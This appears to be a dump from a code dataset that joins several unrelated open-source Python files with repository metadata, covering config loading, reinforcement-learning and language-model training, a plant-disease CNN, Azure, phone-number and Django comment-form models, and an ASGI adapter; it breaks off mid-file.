return cfg, load_trace
@staticmethod
def _parse_defaults(cfg: DictConfig) -> List[DefaultElement]:
valid_example = """
Example of a valid defaults:
defaults:
- dataset: imagenet
- model: alexnet
optional: true
- optimizer: nesterov
"""
if "defaults" in cfg:
defaults = cfg.defaults
else:
defaults = OmegaConf.create([])
if not isinstance(defaults, ListConfig):
raise ValueError(
"defaults must be a list because composition is order sensitive, "
+ valid_example
)
assert isinstance(defaults, ListConfig)
res: List[DefaultElement] = []
for item in defaults:
if isinstance(item, DictConfig):
optional = False
if "optional" in item:
optional = item.pop("optional")
keys = list(item.keys())
if len(keys) > 1:
raise ValueError(f"Too many keys in default item {item}")
if len(keys) == 0:
raise ValueError(f"Missing group name in {item}")
key = keys[0]
config_group, package = ConfigLoaderImpl._split_group(key)
node = item._get_node(key)
assert node is not None
config_name = node._value()
default = DefaultElement(
config_group=config_group,
config_name=config_name,
package=package,
optional=optional,
)
elif isinstance(item, str):
default = DefaultElement(config_group=None, config_name=item)
else:
raise ValueError(
f"Unsupported type in defaults : {type(item).__name__}"
)
res.append(default)
return res
def get_sources(self) -> List[ConfigSource]:
return self.repository.get_sources()
def get_overrides_dirname(
overrides: List[Override], exclude_keys: List[str], item_sep: str, kv_sep: str,
) -> str:
lines = []
for override in overrides:
if override.key_or_group not in exclude_keys:
line = override.input_line
assert line is not None
lines.append(line)
lines.sort()
ret = re.sub(pattern="[=]", repl=kv_sep, string=item_sep.join(lines))
return ret
def _recursive_unset_readonly(cfg: Container) -> None:
if isinstance(cfg, DictConfig):
OmegaConf.set_readonly(cfg, None)
if not cfg._is_missing():
for k, v in cfg.items_ex(resolve=False):
_recursive_unset_readonly(v)
elif isinstance(cfg, ListConfig):
OmegaConf.set_readonly(cfg, None)
if not cfg._is_missing():
for item in cfg:
_recursive_unset_readonly(item)
| 38.59516
| 110
| 0.538751
|
4a110020251a8c39b7b4c1670f90c3cd9112631a
| 15,644
|
py
|
Python
|
softlearning/algorithms/rl_algorithm.py
|
zhaofeng-shu33/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | 1
|
2019-06-12T16:18:49.000Z
|
2019-06-12T16:18:49.000Z
|
softlearning/algorithms/rl_algorithm.py
|
GitHubBeinner/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | null | null | null |
softlearning/algorithms/rl_algorithm.py
|
GitHubBeinner/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | null | null | null |
import abc
from collections import OrderedDict
from distutils.version import LooseVersion
from itertools import count
import gtimer as gt
import math
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.training import training_util
from softlearning.samplers import rollouts
from softlearning.misc.utils import save_video
if LooseVersion(tf.__version__) > LooseVersion("2.00"):
from tensorflow.python.training.tracking.tracking import (
AutoTrackable as Checkpointable)
else:
from tensorflow.contrib.checkpoint import Checkpointable
class RLAlgorithm(Checkpointable):
"""Abstract RLAlgorithm.
Implements the _train and _evaluate methods to be used
by classes inheriting from RLAlgorithm.
"""
def __init__(
self,
sampler,
n_epochs=1000,
train_every_n_steps=1,
n_train_repeat=1,
max_train_repeat_per_timestep=5,
n_initial_exploration_steps=0,
initial_exploration_policy=None,
epoch_length=1000,
eval_n_episodes=10,
eval_deterministic=True,
eval_render_kwargs=None,
video_save_frequency=0,
session=None,
):
"""
Args:
n_epochs (`int`): Number of epochs to run the training for.
n_train_repeat (`int`): Number of times to repeat the training
for single time step.
n_initial_exploration_steps: Number of steps in the beginning to
take using actions drawn from a separate exploration policy.
epoch_length (`int`): Epoch length.
eval_n_episodes (`int`): Number of rollouts to evaluate.
eval_deterministic (`int`): Whether or not to run the policy in
deterministic mode when evaluating policy.
eval_render_kwargs (`None`, `dict`): Arguments to be passed for
rendering evaluation rollouts. `None` to disable rendering.
"""
self.sampler = sampler
self._n_epochs = n_epochs
self._n_train_repeat = n_train_repeat
self._max_train_repeat_per_timestep = max(
max_train_repeat_per_timestep, n_train_repeat)
self._train_every_n_steps = train_every_n_steps
self._epoch_length = epoch_length
self._n_initial_exploration_steps = n_initial_exploration_steps
self._initial_exploration_policy = initial_exploration_policy
self._eval_n_episodes = eval_n_episodes
self._eval_deterministic = eval_deterministic
self._video_save_frequency = video_save_frequency
self._eval_render_kwargs = eval_render_kwargs or {}
if self._video_save_frequency > 0:
render_mode = self._eval_render_kwargs.pop('mode', 'rgb_array')
assert render_mode != 'human', (
"RlAlgorithm cannot render and save videos at the same time")
self._eval_render_kwargs['mode'] = render_mode
self._session = session or tf.keras.backend.get_session()
self._epoch = 0
self._timestep = 0
self._num_train_steps = 0
def _build(self):
self._training_ops = {}
self._init_global_step()
self._init_placeholders()
def _init_global_step(self):
self.global_step = training_util.get_or_create_global_step()
self._training_ops.update({
'increment_global_step': training_util._increment_global_step(1)
})
def _init_placeholders(self):
"""Create input placeholders for the SAC algorithm.
Creates `tf.placeholder`s for:
- observation
- next observation
- action
- reward
- terminals
"""
self._placeholders = {
'observations': {
name: tf.compat.v1.placeholder(
dtype=(
np.float32
if np.issubdtype(observation_space.dtype, np.floating)
else observation_space.dtype
),
shape=(None, *observation_space.shape),
name=name)
for name, observation_space
in self._training_environment.observation_space.spaces.items()
},
'next_observations': {
name: tf.compat.v1.placeholder(
dtype=(
np.float32
if np.issubdtype(observation_space.dtype, np.floating)
else observation_space.dtype
),
shape=(None, *observation_space.shape),
name=name)
for name, observation_space
in self._training_environment.observation_space.spaces.items()
},
'actions': tf.compat.v1.placeholder(
dtype=tf.float32,
shape=(None, *self._training_environment.action_space.shape),
name='actions',
),
'rewards': tf.compat.v1.placeholder(
tf.float32,
shape=(None, 1),
name='rewards',
),
'terminals': tf.compat.v1.placeholder(
tf.bool,
shape=(None, 1),
name='terminals',
),
'iteration': tf.compat.v1.placeholder(
tf.int64, shape=(), name='iteration',
),
}
def _initial_exploration_hook(self, env, initial_exploration_policy, pool):
if self._n_initial_exploration_steps < 1: return
if not initial_exploration_policy:
raise ValueError(
"Initial exploration policy must be provided when"
" n_initial_exploration_steps > 0.")
self.sampler.initialize(env, initial_exploration_policy, pool)
while pool.size < self._n_initial_exploration_steps:
self.sampler.sample()
def _training_before_hook(self):
"""Method called before the actual training loops."""
pass
def _training_after_hook(self):
"""Method called after the actual training loops."""
pass
def _timestep_before_hook(self, *args, **kwargs):
"""Hook called at the beginning of each timestep."""
pass
def _timestep_after_hook(self, *args, **kwargs):
"""Hook called at the end of each timestep."""
pass
def _epoch_before_hook(self):
"""Hook called at the beginning of each epoch."""
self._train_steps_this_epoch = 0
def _epoch_after_hook(self, *args, **kwargs):
"""Hook called at the end of each epoch."""
pass
def _training_batch(self, batch_size=None):
return self.sampler.random_batch(batch_size)
def _evaluation_batch(self, *args, **kwargs):
return self._training_batch(*args, **kwargs)
@property
def _training_started(self):
return self._total_timestep > 0
@property
def _total_timestep(self):
total_timestep = self._epoch * self._epoch_length + self._timestep
return total_timestep
def train(self, *args, **kwargs):
"""Initiate training of the SAC instance."""
return self._train(*args, **kwargs)
def _train(self):
"""Return a generator that performs RL training.
Args:
env (`SoftlearningEnv`): Environment used for training.
policy (`Policy`): Policy used for training
initial_exploration_policy ('Policy'): Policy used for exploration
If None, then all exploration is done using policy
pool (`PoolBase`): Sample pool to add samples to
"""
training_environment = self._training_environment
evaluation_environment = self._evaluation_environment
policy = self._policy
pool = self._pool
if not self._training_started:
self._init_training()
self._initial_exploration_hook(
training_environment, self._initial_exploration_policy, pool)
self.sampler.initialize(training_environment, policy, pool)
gt.reset_root()
gt.rename_root('RLAlgorithm')
gt.set_def_unique(False)
self._training_before_hook()
for self._epoch in gt.timed_for(range(self._epoch, self._n_epochs)):
self._epoch_before_hook()
gt.stamp('epoch_before_hook')
start_samples = self.sampler._total_samples
for i in count():
samples_now = self.sampler._total_samples
self._timestep = samples_now - start_samples
if (samples_now >= start_samples + self._epoch_length
and self.ready_to_train):
break
self._timestep_before_hook()
gt.stamp('timestep_before_hook')
self._do_sampling(timestep=self._total_timestep)
gt.stamp('sample')
if self.ready_to_train:
self._do_training_repeats(timestep=self._total_timestep)
gt.stamp('train')
self._timestep_after_hook()
gt.stamp('timestep_after_hook')
training_paths = self.sampler.get_last_n_paths(
math.ceil(self._epoch_length / self.sampler._max_path_length))
gt.stamp('training_paths')
evaluation_paths = self._evaluation_paths(
policy, evaluation_environment)
gt.stamp('evaluation_paths')
training_metrics = self._evaluate_rollouts(
training_paths, training_environment)
gt.stamp('training_metrics')
if evaluation_paths:
evaluation_metrics = self._evaluate_rollouts(
evaluation_paths, evaluation_environment)
gt.stamp('evaluation_metrics')
else:
evaluation_metrics = {}
self._epoch_after_hook(training_paths)
gt.stamp('epoch_after_hook')
sampler_diagnostics = self.sampler.get_diagnostics()
diagnostics = self.get_diagnostics(
iteration=self._total_timestep,
batch=self._evaluation_batch(),
training_paths=training_paths,
evaluation_paths=evaluation_paths)
time_diagnostics = gt.get_times().stamps.itrs
diagnostics.update(OrderedDict((
*(
(f'evaluation/{key}', evaluation_metrics[key])
for key in sorted(evaluation_metrics.keys())
),
*(
(f'training/{key}', training_metrics[key])
for key in sorted(training_metrics.keys())
),
*(
(f'times/{key}', time_diagnostics[key][-1])
for key in sorted(time_diagnostics.keys())
),
*(
(f'sampler/{key}', sampler_diagnostics[key])
for key in sorted(sampler_diagnostics.keys())
),
('epoch', self._epoch),
('timestep', self._timestep),
('timesteps_total', self._total_timestep),
('train-steps', self._num_train_steps),
)))
if self._eval_render_kwargs and hasattr(
evaluation_environment, 'render_rollouts'):
# TODO(hartikainen): Make this consistent such that there's no
# need for the hasattr check.
training_environment.render_rollouts(evaluation_paths)
yield diagnostics
self.sampler.terminate()
self._training_after_hook()
yield {'done': True, **diagnostics}
def _evaluation_paths(self, policy, evaluation_env):
if self._eval_n_episodes < 1: return ()
with policy.set_deterministic(self._eval_deterministic):
paths = rollouts(
self._eval_n_episodes,
evaluation_env,
policy,
self.sampler._max_path_length,
render_kwargs=self._eval_render_kwargs)
should_save_video = (
self._video_save_frequency > 0
and self._epoch % self._video_save_frequency == 0)
if should_save_video:
for i, path in enumerate(paths):
video_frames = path.pop('images')
video_file_name = f'evaluation_path_{self._epoch}_{i}.avi'
video_file_path = os.path.join(
os.getcwd(), 'videos', video_file_name)
save_video(video_frames, video_file_path)
return paths
def _evaluate_rollouts(self, episodes, env):
"""Compute evaluation metrics for the given rollouts."""
episodes_rewards = [episode['rewards'] for episode in episodes]
episodes_reward = [np.sum(episode_rewards)
for episode_rewards in episodes_rewards]
episodes_length = [episode_rewards.shape[0]
for episode_rewards in episodes_rewards]
diagnostics = OrderedDict((
('episode-reward-mean', np.mean(episodes_reward)),
('episode-reward-min', np.min(episodes_reward)),
('episode-reward-max', np.max(episodes_reward)),
('episode-reward-std', np.std(episodes_reward)),
('episode-length-mean', np.mean(episodes_length)),
('episode-length-min', np.min(episodes_length)),
('episode-length-max', np.max(episodes_length)),
('episode-length-std', np.std(episodes_length)),
))
env_infos = env.get_path_infos(episodes)
for key, value in env_infos.items():
diagnostics[f'env_infos/{key}'] = value
return diagnostics
@abc.abstractmethod
def get_diagnostics(self,
iteration,
batch,
training_paths,
evaluation_paths):
raise NotImplementedError
@property
def ready_to_train(self):
return self.sampler.batch_ready()
def _do_sampling(self, timestep):
self.sampler.sample()
def _do_training_repeats(self, timestep):
"""Repeat training _n_train_repeat times every _train_every_n_steps"""
if timestep % self._train_every_n_steps > 0: return
trained_enough = (
self._train_steps_this_epoch
> self._max_train_repeat_per_timestep * self._timestep)
if trained_enough: return
for i in range(self._n_train_repeat):
self._do_training(
iteration=timestep,
batch=self._training_batch())
self._num_train_steps += self._n_train_repeat
self._train_steps_this_epoch += self._n_train_repeat
@abc.abstractmethod
def _do_training(self, iteration, batch):
raise NotImplementedError
@abc.abstractmethod
def _init_training(self):
raise NotImplementedError
@property
def tf_saveables(self):
return {}
def __getstate__(self):
state = {
'_epoch_length': self._epoch_length,
'_epoch': (
self._epoch + int(self._timestep >= self._epoch_length)),
'_timestep': self._timestep % self._epoch_length,
'_num_train_steps': self._num_train_steps,
}
return state
def __setstate__(self, state):
self.__dict__.update(state)
| 35.473923
| 79
| 0.593774
|
4a1100b0867263baf5006efc8e3c565f94d310cd
| 3,079
|
py
|
Python
|
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
import cv2
import numpy as np
import os
from random import shuffle
from tqdm import tqdm
TRAIN_DIR = 'D:\\pr\\pr\\train\\train'
TEST_DIR = 'D:\\pr\\pr\\test\\test'
IMG_SIZE = 50
LR = 1e-3
MODEL_NAME = 'healthyvsunhealthy-{}-{}.model'.format(LR, '2conv-basic')
def label_img(img):
word_label = img[0]
if word_label == 'h': return [1,0,0,0]
elif word_label == 'b': return [0,1,0,0]
elif word_label == 'v': return [0,0,1,0]
elif word_label == 'l': return [0,0,0,1]
def create_train_data():
training_data = []
for img in tqdm(os.listdir(TRAIN_DIR)):
label = label_img(img)
path = os.path.join(TRAIN_DIR,img)
img = cv2.imread(path,cv2.IMREAD_COLOR)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
training_data.append([np.array(img),np.array(label)])
shuffle(training_data)
np.save('train_data.npy', training_data)
return training_data
def process_test_data():
testing_data = []
for img in tqdm(os.listdir(TEST_DIR)):
path = os.path.join(TEST_DIR,img)
img_num = img.split('.')[0]
img = cv2.imread(path,cv2.IMREAD_COLOR)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
testing_data.append([np.array(img), img_num])
shuffle(testing_data)
np.save('test_data.npy', testing_data)
return testing_data
train_data = create_train_data()
from tensorflow.python.framework import ops
ops.reset_default_graph()
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 3], name='input')
convnet = conv_2d(convnet, 32, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 64, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 128, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 32, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 64, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = fully_connected(convnet, 1024, activation='relu')
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 4, activation='softmax')
convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')
model = tflearn.DNN(convnet, tensorboard_dir='log')
if os.path.exists('{}.meta'.format(MODEL_NAME)):
model.load(MODEL_NAME)
print('model loaded!')
train = train_data[:-500]
test = train_data[-500:]
X = np.array([i[0] for i in train]).reshape(-1,IMG_SIZE,IMG_SIZE,3)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1,IMG_SIZE,IMG_SIZE,3)
test_y = [i[1] for i in test]
model.fit({'input': X}, {'targets': Y}, n_epoch=8, validation_set=({'input': test_x}, {'targets': test_y}),
snapshot_step=40, show_metric=True, run_id=MODEL_NAME)
model.save(MODEL_NAME)
| 29.893204
| 114
| 0.678467
|
4a110100c65f7d863d4c97ff4d0fa631848c53d4
| 8,148
|
py
|
Python
|
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | 1
|
2022-03-13T00:09:58.000Z
|
2022-03-13T00:09:58.000Z
|
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | null | null | null |
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/32_text.models.awdlstm.ipynb (unless otherwise specified).
from __future__ import annotations
__all__ = ['dropout_mask', 'RNNDropout', 'WeightDropout', 'EmbeddingDropout', 'AWD_LSTM', 'awd_lstm_lm_split',
'awd_lstm_lm_config', 'awd_lstm_clas_split', 'awd_lstm_clas_config']
# Cell
#nbdev_comment from __future__ import annotations
from ...data.all import *
from ..core import *
# Cell
def dropout_mask(
x:Tensor, # Source tensor, output will be of the same type as `x`
sz:list, # Size of the dropout mask as `int`s
p:float # Dropout probability
) -> Tensor: # Multiplicative dropout mask
"Return a dropout mask of the same type as `x`, size `sz`, with probability `p` to cancel an element."
return x.new_empty(*sz).bernoulli_(1-p).div_(1-p)
# Cell
class RNNDropout(Module):
"Dropout with probability `p` that is consistent on the seq_len dimension."
def __init__(self, p:float=0.5): self.p=p
def forward(self, x):
if not self.training or self.p == 0.: return x
return x * dropout_mask(x.data, (x.size(0), 1, *x.shape[2:]), self.p)
# Cell
class WeightDropout(Module):
"A module that wraps another layer in which some weights will be replaced by 0 during training."
def __init__(self,
module:nn.Module, # Wrapped module
weight_p:float, # Weight dropout probability
layer_names:(str,list)='weight_hh_l0' # Name(s) of the parameters to apply dropout to
):
self.module,self.weight_p,self.layer_names = module,weight_p,L(layer_names)
for layer in self.layer_names:
#Makes a copy of the weights of the selected layers.
w = getattr(self.module, layer)
delattr(self.module, layer)
self.register_parameter(f'{layer}_raw', nn.Parameter(w.data))
setattr(self.module, layer, w.clone())
if isinstance(self.module, (nn.RNNBase, nn.modules.rnn.RNNBase)):
self.module.flatten_parameters = self._do_nothing
def _setweights(self):
"Apply dropout to the raw weights."
for layer in self.layer_names:
raw_w = getattr(self, f'{layer}_raw')
if self.training: w = F.dropout(raw_w, p=self.weight_p)
else: w = raw_w.clone()
setattr(self.module, layer, w)
def forward(self, *args):
self._setweights()
with warnings.catch_warnings():
# To avoid the warning that comes because the weights aren't flattened.
warnings.simplefilter("ignore", category=UserWarning)
return self.module(*args)
def reset(self):
for layer in self.layer_names:
raw_w = getattr(self, f'{layer}_raw')
setattr(self.module, layer, raw_w.clone())
if hasattr(self.module, 'reset'): self.module.reset()
def _do_nothing(self): pass
# Cell
class EmbeddingDropout(Module):
"Apply dropout with probability `embed_p` to an embedding layer `emb`."
def __init__(self,
emb:nn.Embedding, # Wrapped embedding layer
embed_p:float # Embdedding layer dropout probability
):
self.emb,self.embed_p = emb,embed_p
def forward(self, words, scale=None):
if self.training and self.embed_p != 0:
size = (self.emb.weight.size(0),1)
mask = dropout_mask(self.emb.weight.data, size, self.embed_p)
masked_embed = self.emb.weight * mask
else: masked_embed = self.emb.weight
if scale: masked_embed.mul_(scale)
return F.embedding(words, masked_embed, ifnone(self.emb.padding_idx, -1), self.emb.max_norm,
self.emb.norm_type, self.emb.scale_grad_by_freq, self.emb.sparse)
# Cell
class AWD_LSTM(Module):
"AWD-LSTM inspired by https://arxiv.org/abs/1708.02182"
initrange=0.1
def __init__(self,
vocab_sz:int, # Size of the vocabulary
emb_sz:int, # Size of embedding vector
n_hid:int, # Number of features in hidden state
n_layers:int, # Number of LSTM layers
pad_token:int=1, # Padding token id
hidden_p:float=0.2, # Dropout probability for hidden state between layers
input_p:float=0.6, # Dropout probability for LSTM stack input
embed_p:float=0.1, # Embedding layer dropout probabillity
weight_p:float=0.5, # Hidden-to-hidden wight dropout probability for LSTM layers
bidir:bool=False # If set to `True` uses bidirectional LSTM layers
):
store_attr('emb_sz,n_hid,n_layers,pad_token')
self.bs = 1
self.n_dir = 2 if bidir else 1
self.encoder = nn.Embedding(vocab_sz, emb_sz, padding_idx=pad_token)
self.encoder_dp = EmbeddingDropout(self.encoder, embed_p)
self.rnns = nn.ModuleList([self._one_rnn(emb_sz if l == 0 else n_hid, (n_hid if l != n_layers - 1 else emb_sz)//self.n_dir,
bidir, weight_p, l) for l in range(n_layers)])
self.encoder.weight.data.uniform_(-self.initrange, self.initrange)
self.input_dp = RNNDropout(input_p)
self.hidden_dps = nn.ModuleList([RNNDropout(hidden_p) for l in range(n_layers)])
self.reset()
def forward(self, inp:Tensor, from_embeds:bool=False):
bs,sl = inp.shape[:2] if from_embeds else inp.shape
if bs!=self.bs: self._change_hidden(bs)
output = self.input_dp(inp if from_embeds else self.encoder_dp(inp))
new_hidden = []
for l, (rnn,hid_dp) in enumerate(zip(self.rnns, self.hidden_dps)):
output, new_h = rnn(output, self.hidden[l])
new_hidden.append(new_h)
if l != self.n_layers - 1: output = hid_dp(output)
self.hidden = to_detach(new_hidden, cpu=False, gather=False)
return output
def _change_hidden(self, bs):
self.hidden = [self._change_one_hidden(l, bs) for l in range(self.n_layers)]
self.bs = bs
def _one_rnn(self, n_in, n_out, bidir, weight_p, l):
"Return one of the inner rnn"
rnn = nn.LSTM(n_in, n_out, 1, batch_first=True, bidirectional=bidir)
return WeightDropout(rnn, weight_p)
def _one_hidden(self, l):
"Return one hidden state"
nh = (self.n_hid if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
return (one_param(self).new_zeros(self.n_dir, self.bs, nh), one_param(self).new_zeros(self.n_dir, self.bs, nh))
def _change_one_hidden(self, l, bs):
if self.bs < bs:
nh = (self.n_hid if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
return tuple(torch.cat([h, h.new_zeros(self.n_dir, bs-self.bs, nh)], dim=1) for h in self.hidden[l])
if self.bs > bs: return (self.hidden[l][0][:,:bs].contiguous(), self.hidden[l][1][:,:bs].contiguous())
return self.hidden[l]
def reset(self):
"Reset the hidden states"
[r.reset() for r in self.rnns if hasattr(r, 'reset')]
self.hidden = [self._one_hidden(l) for l in range(self.n_layers)]
# Cell
def awd_lstm_lm_split(model):
"Split a RNN `model` in groups for differential learning rates."
groups = [nn.Sequential(rnn, dp) for rnn, dp in zip(model[0].rnns, model[0].hidden_dps)]
groups = L(groups + [nn.Sequential(model[0].encoder, model[0].encoder_dp, model[1])])
return groups.map(params)
# Cell
awd_lstm_lm_config = dict(emb_sz=400, n_hid=1152, n_layers=3, pad_token=1, bidir=False, output_p=0.1,
hidden_p=0.15, input_p=0.25, embed_p=0.02, weight_p=0.2, tie_weights=True, out_bias=True)
# Cell
def awd_lstm_clas_split(model):
"Split a RNN `model` in groups for differential learning rates."
groups = [nn.Sequential(model[0].module.encoder, model[0].module.encoder_dp)]
groups += [nn.Sequential(rnn, dp) for rnn, dp in zip(model[0].module.rnns, model[0].module.hidden_dps)]
groups = L(groups + [model[1]])
return groups.map(params)
# Cell
awd_lstm_clas_config = dict(emb_sz=400, n_hid=1152, n_layers=3, pad_token=1, bidir=False, output_p=0.4,
hidden_p=0.3, input_p=0.4, embed_p=0.05, weight_p=0.5)
| 44.282609
| 131
| 0.650466
|
4a11025a55876475d61bd91d8972cac6ae9f1dac
| 1,065
|
py
|
Python
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SshConfiguration(Model):
"""SSH configuration for Linux based VMs running on Azure.
:param public_keys: The list of SSH public keys used to authenticate with
linux based VMs.
:type public_keys:
list[~azure.mgmt.compute.v2016_04_30_preview.models.SshPublicKey]
"""
_attribute_map = {
'public_keys': {'key': 'publicKeys', 'type': '[SshPublicKey]'},
}
def __init__(self, **kwargs):
super(SshConfiguration, self).__init__(**kwargs)
self.public_keys = kwargs.get('public_keys', None)
| 34.354839
| 77
| 0.610329
|
4a1102a270ec95019010d0c6b79c743ee38d5316
| 993
|
py
|
Python
|
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | 1
|
2015-01-31T01:17:14.000Z
|
2015-01-31T01:17:14.000Z
|
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | null | null | null |
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | null | null | null |
"""Auto-generated file, do not edit by hand. MC metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_MC = PhoneMetadata(id='MC', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='1\\d{1,2}', possible_number_pattern='\\d{2,3}'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='1(?:12|[578])', possible_number_pattern='\\d{2,3}', example_number='112'),
short_code=PhoneNumberDesc(national_number_pattern='1(?:12|41|[578])', possible_number_pattern='\\d{2,3}', example_number='112'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
carrier_specific=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_data=True)
| 76.384615
| 133
| 0.783484
|
4a1102cd5762dcb269d8c993d0729cf370abc698
| 1,509
|
py
|
Python
|
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | null | null | null |
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | 33
|
2017-02-14T15:45:16.000Z
|
2022-03-11T23:22:29.000Z
|
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | null | null | null |
from django_comments.forms import CommentForm
from django import forms
from django.utils.translation import ugettext_lazy as _
from bettertexts.models import TextComment
class TextCommentForm(CommentForm):
def __init__(self, *args, **kwargs):
super(TextCommentForm, self).__init__(*args, **kwargs)
self.fields["name"].label = _("Name")
self.fields["name"].required = True
self.fields["email"].label = _("Email address")
self.fields["email"].required = True
self.fields["comment"].label = _("Comment")
self.fields["comment"].required = True
self.fields["url"].widget = forms.HiddenInput()
inform = forms.BooleanField(
required=False, label=_("Keep me informed"), widget=forms.CheckboxInput
)
involved = forms.BooleanField(
required=False, label=_("Keep me involved"), widget=forms.CheckboxInput
)
class Meta:
fields = ["name", "email", "inform", "comment"]
def get_comment_model(self):
"""
override to provide a custom comment model.
"""
return TextComment
def get_comment_create_data(self, site_id=None):
"""
Override to add inform and involved field
"""
data = super(TextCommentForm, self).get_comment_create_data(site_id)
data.update(
{
"inform": self.cleaned_data["inform"],
"involved": self.cleaned_data["involved"],
}
)
return data
| 31.4375
| 79
| 0.622929
|
4a1102dcc914f81241efa01b8276e048cbbebf9d
| 4,590
|
py
|
Python
|
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
import logging
from contextlib import ExitStack
from typing import (
Any,
ContextManager,
Callable,
Dict,
Optional,
TYPE_CHECKING,
)
from .exceptions import ConfigurationError
from .handlers import AbstractHandler
from .protocols import HTTPCycle, WebSocketCycle, LifespanCycle
from .backends import WebSocket
from .types import ASGIApp, WsRequest
if TYPE_CHECKING: # pragma: no cover
from awslambdaric.lambda_context import LambdaContext
DEFAULT_TEXT_MIME_TYPES = [
"text/",
"application/json",
"application/javascript",
"application/xml",
"application/vnd.api+json",
]
logger = logging.getLogger("mangum")
class Mangum:
"""
Creates an adapter instance.
* **app** - An asynchronous callable that conforms to version 3.0 of the ASGI
specification. This will usually be an ASGI framework application instance.
* **lifespan** - A string to configure lifespan support. Choices are `auto`, `on`,
and `off`. Default is `auto`.
* **api_gateway_base_path** - Base path to strip from URL when using a custom
domain name.
* **text_mime_types** - A list of MIME types to include with the defaults that
should not return a binary response in API Gateway.
* **dsn** - A connection string required to configure a supported WebSocket backend.
